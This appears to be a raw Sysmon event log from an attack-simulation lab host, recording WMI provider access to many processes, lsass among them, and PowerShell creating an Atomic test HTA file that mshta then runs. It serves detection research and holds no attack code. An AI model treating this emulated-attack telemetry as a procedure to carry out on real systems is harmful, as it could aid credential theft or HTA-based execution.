16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000028615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDownloads2021-01-20 16:00:15.458{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta2021-01-20 15:44:17.216 11241100x800000000000000028614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDownloads2021-01-20 16:00:15.349{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta2021-01-20 15:44:17.216 10341000x800000000000000028819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8F06-00000000A301}2384C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C